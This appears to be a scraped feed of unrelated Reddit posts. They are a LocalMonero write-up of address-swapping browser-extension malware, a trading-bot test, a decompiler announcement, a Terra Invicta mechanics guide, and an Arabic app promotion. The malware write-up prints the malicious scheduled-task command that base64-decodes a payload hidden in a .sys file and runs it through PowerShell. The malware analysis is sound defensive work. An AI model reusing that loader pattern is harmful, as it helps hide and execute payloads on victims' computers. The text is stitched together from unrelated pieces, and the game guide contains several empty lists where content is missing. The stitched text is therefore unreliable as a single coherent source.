After the user got in touch with our support staff, he initially reported it as a bug. Upon examining the situation we asked the user to conduct some tests and record them. It was clear from the recordings provided by the user that we were actually dealing with a very devious form of malware here.
You should watch this video just to see how it works
As you can see, this doesn't work like the clipboard-replacing malware we've all heard about. Instead, this malware actually waits until you hit the submit button before replacing the address in a way that's hidden from you unless it errors out.
Not only that, it can also be seen from the video that even checking the settlement address on the trade page isn't effective, as the malware seems to be able to detect the address string and remove it entirely.

Not a bug

Hearing this our user was surprised to learn that this is malware as opposed to a bug. After all, the user had run a Windows Defender scan and it turned up nothing. Unfortunately, it seems that Windows Defender is inadequate in detecting these threats. After installing and running MalwareBytes, the user reported that the scan did, in fact, turn up quite the rap sheet of malware on their computer:
Folder: 10 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN, Quarantined, 5865, 1082968, 1.0.61045, , ame, , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , , File: 38 Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN\3.1.5._0\RULES.JSON, Quarantined, 5865, 1082968, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets\_ruleset1, Quarantined, 5865, 1082968, , , , , 96CD8447C2055A5C002F8F47706D97D2, 126203311363ACC2DB796999DF99FB3ADD785F909F8E68B45DF1CAB55AD07F01 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\128.png, Quarantined, 5865, 1082968, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\content.bootstrap.js, Quarantined, 5865, 1082968, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\manifest.json, Quarantined, 5865, 1082968, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_block.js, Quarantined, 5865, 1082968, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_bnb.js, Quarantined, 5865, 1082968, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_cb.js, Quarantined, 5865, 1082968, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_common.js, Quarantined, 5865, 1082968, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_content.js, Quarantined, 5865, 1082968, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_gt.js, Quarantined, 5865, 1082968, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_kuc.js, Quarantined, 5865, 1082968, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ\5.3.7._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.BitCoinStealer, C:\WINDOWS\SYSTEM32\DRIVERS\QOTOP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.SYS, Quarantined, 3900, 1055561, 1.0.61045, , ame, , 842BB565271B118499304C2CCB07DD28, 8A59A9259522FF2FA06B5F01860862C0D200D8ECEB228E39855FB7C3ACF5D3EF Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ\4.4.6._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata\generated_indexed_rulesets\_ruleset1, Quarantined, 5865, 1090470, , , , , 96CD8447C2055A5C002F8F47706D97D2, 126203311363ACC2DB796999DF99FB3ADD785F909F8E68B45DF1CAB55AD07F01 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.Tasker.Decoder, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975, Quarantined, 15659, 1055267, 1.0.61045, , ame, , 08D97ED74B014695C9110418D96472C4, 4DC2C05854644C918AF20E5CE3B255C74D3B126D49D1A548A6D7E4243C451C05 Trojan.BitCoinMiner.E, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\User, Quarantined, 3659, 1090462, 1.0.61045, , ame, , 934E89A3A99C184F1798775D4BE62CD4, D11427934919F664C3F27DF0E2DAECF71E1667BA6EA46D048832476C09B8F273 
As you can see, there's a bunch of Chrome and Edge (which are both derived from Chromium) browser extension files that are marked as Trojans, albeit BitcoinMiner as opposed to the BitcoinStealer system32 file. Don't be fooled by that, though. While it's true that antivirus software often labels harmless crypto software as malicious, in this particular case we weren't actually dealing with a legitimate mining extension but a malicious stealing one instead. The user had never installed any mining or crypto-related extensions.

How did we get here?

After conducting some more tests, decompiling the sys32 file, we seemed to have figured out that the sys32 file was a vbscript file. We later discovered a malicious Windows system task that was designed to run that file:
   Internet, Health \Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975    true PT59M   true PT59M     HighestAvailable AA-SURFACE\amer0 InteractiveToken    Parallel false false false  false false  true true false true PT0S 1    wscript.exe /e:vbscript /b "C:\Windows\System32\zYYdBt3ZQs\4AA2C936-A6E9-4413-9AA4-72BE7EF9CFC4" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\QoToP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.sys'), 2183100, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"    
And running that file seems to install the extensions on your Chromium-based browsers. Firefox-based browsers seem to be not affected by this. We figured this out when we were testing if the malware replaced the address in the Tor Browser (based on Firefox) too. It didn't, and no malicious extensions seem to have been present in the Tor browser. However, this is simply because the malware doesn't contain any Firefox extension, as opposed to some built in Firefox security feature. This is an important distinction to make, since Firefox is widely considered to be a secure browser by the general public despite being way behind Chromium in security according to some of the most prominent security researchers in the industry.
(As a sidenote, something like Ungoogled Chromium seems to be the best security/privacy desktop browser solution out there at this time.)

NoJS saves the day

During our tests to figure out the scope and MO of the malware, we managed to figure out that if you had our website running in NoJS mode you'd be safe from the effects of this particular malware despite having your browser compromised by the extension. When the user attempted to open the trade using the NoJS version of our site from the infected Chrome browser the malware was unable to replace the address. This isn't to say that NoJS would save you against all potential threats, but it certainly massively reduces the attack surface.

What do I need to look for?

Check out how the malicious extension looked like in the user's browser:
How the extension looks like (just an image, safe to click)
Extension permissions (just an image, safe to click)
Basically, the extension disguised itself as a Google Sheets extension. Pretty sneaky, like an Ork painted in purple. The dead giveaway, in this case, can be found in the extension permissions. Notice that it wants access to all sites and to block content on a page.

Conclusion

Malware sucks. It's easy to get and hard to get rid of. Keep your internet habits clean. Never open unknown links and never trust unknown files. When using LocalMonero, try sticking to NoJS mode for maximum security.
Stay safe!
P.S. We have the malware files quarantined, but we won't be publishing the link to download the malware here to prevent accidental infections. If there are any security researchers who wish to dissect them please PM me and we'll send you the link.
submitted by Alex_LocalMonero to Monero [link] [comments]

Should we trust a trading robot?

Should we trust a trading robot from an unknown person, I would say no or simply beware of it because many of the developers of these robots promise very high earnings, others even promise to turn you into a millionaire with back tests having very high results in a very short time. On the other hand, the robot shows back tests with an initial deposit of 100 USD transformed into 1 million dollars in 1 year.
If this is the case, why sell these robots for $30, $100 or $200? This is a question that I often ask myself and two answers come to mind, the first is that they are too nice and the second is that it is simply scam.
Let's assume that the first assumption is true and that their robot can turn $100 into $1 million or $100 thousand in just one year so why sell it? Why not share it for free because the owner of such a robot should already be very rich.
The second hypothesis seems more true than the first, it is simply a scam, no one will sell a tranding robot as sophisticated at a price as ridiculous as these prices that we find on most websites and Marketplace.
To remove any ambiguity about my position, I decided to carry out some test and experiment on the most sold robots on metatrader. I chose the best-selling EA's (including 50 EA's) with supposedly better results with promises to become a millionaire in a year.
- I started by performing the back tests and the results were good as expected, more than 46 robots passed the back test stage.
- So I decided to crack the test robots to install them each on a demo account with a balance of $ 1000 according to the instructions of the owners. A month after 19/50 accounts were negative. Three months later, 23 accounts had $0 balances, 16 accounts had negative balances and only 11 accounts had positive balances. Six months later, 36 accounts had balances of $0 and 6 accounts had negative balances and only 8 accounts with positive balances. A year later, there were only 4 accounts left with positive balances and a very inferior result compared to the promise of departure. The best robot to get a return on investment of 328%.
- I decided to decompile them to get an idea about their source code and the surprise is that most of these robots are optimized for back tests, others contained codes that allow the robot to make decisions and not to take them at specific times during tests.
I invite you to pay close attention to the results of the back test that the robot owners present to you and not to trust too much the back test that you perform on the robots, they are sometimes fake. I would like to clarify to you that I am not the author of these robots and I do not sell them, it is just a test that I carried out and I wanted to share with you the results. To avoid advertisements and counter-advertising for these robots, I therefore decided not to give the names of these robots used during the study. The question we have to ask ourselves now is how long will his robots still be profitable, for 2 years? 3 years? 5 years? …
submitted by Ugenislab to algotrading [link] [comments]

Universal C Decompiler is now avaible for download (open source)

we made a decompiler which use a special alghorithm that converts assembly to c code
its very accurate and gives less junk code compared to other decompilers such as IDA or Ghidra
it also reviewed and rated in kharazmi software dev event (it got 5 stars)
this is first decompiler ever made in my country
for the logic we used python and for gui we used python for first releases and vc after release
the program is finished but it has some bugs and features that not added so be patient
we are a team of 3 and we want you to support us just giving us ideas
heres download link
https://github.com/hanicraft/Universal-C-Decompiler
kharazmi rating link
https://logo.saramad.iverify.aspx?CodeShamad=1-1-870113-62-0-2
submitted by mhjhacker1 to REGames [link] [comments]

Alien and Faction Hatred Mechanics Explained

I decompiled the game's source and looked over the code related to the alien and faction hatred mechanics. Here's what I found:
The Basics:
Faction relationships are governed by a hatred score. This is an integer value that determines how poorly a faction feels about another; the higher the score for another faction, the more it's hated. Each faction has a separate hatred score for every other faction, including the aliens. In the code, the aliens are treated as yet another faction, so they have a relationship/hatred score with each faction as well.
There's 3 different tiers of hatred levels for human factions:
For the alien faction, there's only 2 tiers: not at war (< 50) and war (>= 50). The alien threat indicator on the intel screen shows the estimated alien hatred level, with each light corresponding to an increase of 10 hatred. However, it's important to remember this is an estimate of the alien's hatred level, whereas the human factions level on the intel screen is accurate (more details further on).
At each level, factions will prioritize aggressive actions and target hated factions more. In addition, they'll also be harder to trade and cooperate with. After the aliens reach the war phase, they'll target your ships and habs until the threat drops below 50.
Factions also have a minimum hatred score for each faction. Ideological differences affect this as well as used mission control (MC) cap. If the minimum level climbs above the current hate level, the hate level is moved up to the minimum.
How Hatred Scores Change for Human Factions:
Aggressive actions and combat increases hatred against the attacking faction. There is a table of hatred increasing councilor and military actions below. Trade is the only action that decreases hatred directly. Equal trades decrease hatred by -9 and favorable trades decrease hatred by -18. Having a hatred score above a 6 with a faction hampers your ability to trade with them, so it's important to trade early and often with factions you want to ally.
Note: Every time a hatred modifier is applied, the value is multiplied by a random value between 0.8 and 1.2. This means that the hatred score changes you get in-game can be between 80% to 120% of the values listed in this post.
Hatred also changes over time. Each faction has a rival (referred to in the code as mostPowerfulHumanEnemy) which is the faction that most threatens them. Threat is generated by CPs, tech score, MC usage, etc. Every month, each faction gains hatred for its rival faction and loses hatred for everyone else.
Note: hatred does not factor into the threat score, so you can be a tolerant faction's rival. If you're doing better than the AI, they'll likely hate you regardless of what you do.
Note: Threat = CP Points + Sum of all armies' tech level * 0.5 + # of active hab modules * 0.3 + sum of all ship's structural integrity scores * 0.3 + # of objectives completed * 10
Factions gain hatred for their rival proportionate to how much better the rival is doing:
If the rival also has an opposing ideology, this gain is increased by +2. Also, unlocking a faction's victory condition increases it by a further +1. For example, the Servant's hatred for the Resistance will increase by +6 every 2 months if the Resistance is their rival, is doing much better, and has victory conditions unlocked.
Hatred decays for all other factions:
Every other month (technically, every even numbered month), hatred also decays according to the above rules for the rival in addition to the usual hatred gain being applied. Following the example above, in August the Servants will both gain +6 hatred and lose -1 hatred for the Resistance. This means that if a faction is very far ahead of its rival and is not ideologically opposed to them (gain is 0), then they will slowly lose hatred for their rival.
Minimum hatred score is typically 0, but is set to 20 (Conflicted) for ideologically opposite factions. This means that you can never become Tolerant of Humanity First as the Protectorate.
Faction hatred can grow pretty much infinitely, so if you piss off a faction (or the Aliens) enough, it can become virtually impossible to get them back to Tolerance.
How Hatred Score Changes for the Aliens:
All of the hatred score rules for the human factions also applies to the aliens. Actions that increase hatred for human factions also increases it for the aliens.
Hatred also changes over time with the aliens. The every other month decay for rivals matters more than for human factions. The aliens will likely evaluate themselves as being ahead of your faction until mid/late game, so their threat level/hatred for your faction will decay even if you're the most powerful human faction to start. However, once you're a significant threat/very advanced, they'll start gaining threat like the other factions.
Unlike human factions, the minimum hatred level is now influenced by MC usage. For anti-alien factions, the minimum hatred level is either 20 or the difficulty modifier * MC, whichever is higher. For the other factions (excepting the Servants, which are permanently allied to the aliens and cannot gain hatred), the minimum level is just the modifier * MC. Difficulty level modifiers are as follows:
Note: this is before researching the hab limit increasing techs.
Note: it is MC usage and not MC cap that affects the minimum level. Building up a lot of cap, but not using any of it will not affect the threat level. Also, it doesn't matter where the cap is coming from or how it's used.
This means that increasing your MC usage enough will increase the minimum hatred level past the point of being at war with the aliens. For example, if you have 125 MC on normal, you cannot be at peace with the aliens (125 MC * 0.4 = 50).
Servant hatred and alien hatred scores are related. Gaining hatred with one will increase hatred for the other according to the following relationships:
Same situation applies to the Protectorate, but only if they can contact the Aliens and to a much smaller extent
Note: while you can decrease hatred with the Servants/Protectorate through trade (if you can), that decrease does not transfer to the aliens.
The alien threat indicator is only an estimate of the actual alien hatred level. At the start of the game, the estimated level will be at 0 for all factions. In contrast, the actual level will start at 20 for anti-alien factions (the Resistance and Humanity First). Every time hatred increases for the aliens, the hatred value is added to the estimated threat level before the 80-120% variance is applied. As a result, the estimated level change can be higher or lower than the actual change depending on RNG. The estimate is only corrected to the actual value after detaining an alien councilor or contacting the aliens as the Servants/Protectorate. All of these changes means that the alien threat indicator can be wildly off the real alien threat and you shouldn't necessarily trust it before detaining your first alien.
Aliens lose hatred by destroying your space assets and armies. However, after the aliens declare total war after a certain period of time has passed, this no longer applies (without all of your MC being wiped out). The number of years before total war is declared depends on difficulty:
Note: even on brutal difficulty, the alien's hatred score still needs to reach 50 before they start going after you. Also, if you're playing as the Servants, this relationship is inverted; higher difficulty means more time until the aliens get serious.
In summary, the alien's hatred of you and other factions functions in much the same way as a human faction, but with some crucial differences. MC usage
Everything that Affects Hatred:
Councilor Mission Table (all missions that don't affect hatred are not listed):
Mission Critical Failure Failure Success Critical Success
Assassinate 5 0 10 0
Control Space Asset 2 2 7 7
Seize Space Asset 2 2 10 10
Coup 3 0 5 5
Crackdown 0 0 2 0
Detain 1 1 2 3
Extract Councilor 0 0 1 1
Hostile Takeover 1 0 2 2
Purge 1 1 5 5
Sabotage Facilities 2 0 3 0
Sabotage Hab Module 2 2 0 0
Sabotage Project 2 0 3 0
Steal Project 2 0 3 0
Turn Councilor 3 3 0 0
Cause Unrest 2 0 0 0
Dominate Nation 30 20 5 5
Assault Alien Asset * 2 2 10 10
* Burning xeno-forming is a special case that does not raise hatred levels
Note: If a faction detects (and has basic intel on) a councilor of another faction performing an action that affects them and causes hatred on success, they'll gain hatred equal to its success hatred / 2 regardless of whether the action succeeded or not.
Combat Effects:
Alien-Specific Effects:
Other things that generate hate:
Notes/Misc:
Weird things in the code:
Ideology Notes:
Trading Notes:
submitted by AlbatrossAirline to TerraInvicta [link] [comments]

تحميل تطبيق جيزي للمشي djezzy للاندرويد و للايفون 2022 مجانا - متجر هواوي

يعد تطبيق جيزي انترنت djezzy internet للاندرويد من افضل واهم التطبيقات التي صممت خصيصا لتقدم للمستخدم كل ما هو جديد واهم العروض والخدمات وهو في منزله، فهو يقدم عروض الانترنت من خلال عدة نقرات فقط وبسرعة هائلة.
ويعمل تطبيق جيزي Djezzy للمستخدم إمكانية التحكم في شريحته، وذلك من خلال عدة عمليات متنوعة يقوم بها عبر هاتفه الذكي و دون الحاجة إلى التنقل من مكانه مثل، توقيف الشريحة أو إعادة تشغيلها، طلب الرمزPUK و PIN2 ، تعبئة الرصيد، العثور على محل.
وحتى يتمتع المستخدم بالمميزات التي يتمتع بها التطبيق Djezzy، عليه أن يتأكد انه متصل بشبكة جازي ويس شبكة واي فاي، كما أنه يعمل على تقديم اهم العروض التي تناسب المستخدمين والحصول عليها بكل سهولة.
ويتمتع التطبيق بواجهة سهلة وبسيطة، حيث يحتوي التطبيق على أفضل واهم العروض الخاصة بالإنترنت، ويسمح لهم باختيار العرض المناسب لهم، كما ان طريقة استخدام تطبيق جيزي انترنت سهلة جدا ولا تحتاج الى خبرة للتعامل معه.
https://huawei-store.net/djezzy/
